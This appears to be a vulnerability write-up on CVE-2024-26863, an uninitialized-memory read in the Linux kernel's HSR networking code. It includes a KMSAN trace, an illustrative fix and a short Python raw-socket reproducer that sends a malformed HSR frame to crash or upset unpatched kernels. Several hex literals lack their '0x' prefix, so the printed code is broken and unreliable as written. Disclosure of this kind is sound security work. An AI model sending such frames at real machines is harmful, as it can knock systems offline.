A vulnerability identified as CVE-2024-26863 has been resolved in recent Linux kernel versions. The bug was found in the High-availability Seamless Redundancy (HSR) networking subsystem, specifically in the hsr_get_node() function. Exploiting this flaw could allow an attacker to potentially trigger undefined behavior through uninitialized memory access, causing various issues such as unpredictable crashes or, in some edge cases, escalating to privileged code execution.

What Is the HSR Subsystem?

HSR (High-availability Seamless Redundancy) is a network protocol used for fault tolerance in industrial and mission-critical environments. It provides seamless communication by sending duplicate packets over two redundant paths. The Linux kernel implements HSR support in the net/hsr/ subsystem.

The Issue

The vulnerability was discovered thanks to Kernel Memory Sanitizer (KMSAN), which reported an uninitialized value access in hsr_get_node(). In layman's terms, under certain circumstances, the kernel would read memory that wasn't properly initialized. This could lead to the kernel making decisions based on random or garbage data.

The bug happens specifically when an Ethernet frame has a type field of either ETH_P_PRP or ETH_P_HSR, but the packet following it does not contain an HSR tag. When this occurs, hsr_get_skb_sequence_nr() would try to parse data that isn't really there, pulling out an invalid sequence number and doing further processing on it.

Below is a snippet from an actual bug report

BUG: KMSAN: uninit-value in hsr_get_node+xa2e/xa40 net/hsr/hsr_framereg.c:246
 hsr_get_node+xa2e/xa40
 fill_frame_info net/hsr/hsr_forward.c:577 [inline]
 hsr_forward_skb+xe12/x30e
 hsr_dev_xmit+x1a1/x270
 ...
 entry_SYSCALL_64_after_hwframe+x63/x6b

Root Cause

When the kernel tries to extract the HSR tag to get the sequence number, it assumes that the packet is formatted correctly. Without proper checks, it can end up accessing memory that hasn't been initialized.

Exploitability

This kind of bug is mainly a Denial-of-Service (DoS) vector through kernel crashes, but depending on the surrounding code and usage, an experienced attacker could exploit the uninitialized read for broader impact:

- Unprivileged User: Needs to be able to send specially crafted Ethernet frames to a network interface in HSR mode.

Result: Could induce kernel crashes or unexpected behavior (DoS).

- Arbitrary Code Execution: Unlikely in this specific scenario, but uninitialized memory access always carries some risk beyond just DoS.

The Fix

The Linux developers fixed the bug by adding a simple check: Before trying to read the HSR tag, the code now confirms that the Ethernet header is followed by a valid HSR tag. If not, it bails out early by returning NULL.

Below is an illustration of how the patch mitigated the vulnerability

/* net/hsr/hsr_framereg.c */

struct hsr_node *hsr_get_node(struct hsr_priv *hsr, struct sk_buff *skb)
{
    ...
    /* Check for presence of HSR tag before parsing */
    if (!pskb_may_pull(skb, sizeof(struct hsr_tag)))
        return NULL;  // New: Fail fast if not enough data present

    seq_nr = hsr_get_skb_sequence_nr(skb);
    ...
}

This check prevents accessing potentially uninitialized memory in cases where the HSR tag is missing.

Proof Of Concept (PoC) Exploit

Here’s an example (not a full exploit, but a reproducer) using raw sockets to send a “bad” packet that triggers the bug:

import socket
import struct

# Craft a fake Ethernet frame with ETH_P_HSR type but NO actual HSR tag
ethertype_hsr = x892F
dst_mac = b'\xaa\xbb\xcc\xdd\xee\xff'
src_mac = b'\x11\x22\x33\x44\x55\x66'
frame = dst_mac + src_mac + struct.pack('!H', ethertype_hsr)
frame += b'BADTAG'  # Not a real HSR tag

s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
s.bind(("hsr", ))  # Replace with your HSR interface

s.send(frame)

By sending frames like this to a machine with an HSR-enabled interface, prior to the patch, the kernel could read uninitialized values, possibly leading to a crash or KMSAN complaint.

Impacted: Kernel versions up to v6.7 (if backported elsewhere, also those before patch merge)

- Fixed in: Upstream Commit

See the full patch here.

References

- Linux Kernel Patch
- KMSAN Bug Report
- HSR Wikipedia
- CVE-2024-26863 at NVD (when available)

Conclusion

CVE-2024-26863 demonstrates how one overlooked check in kernel code can open the door to subtle but critical system stability issues. While this specific problem may be more likely to result in a DoS than a full system compromise, it serves as a reminder of the importance of input validation, especially at the boundary between hardware and software. Patch your systems if HSR is in use, and keep kernel security practices up-to-date!

Timeline

Published on: 04/17/2024 11:15:09 UTC
Last modified on: 01/27/2025 15:05:39 UTC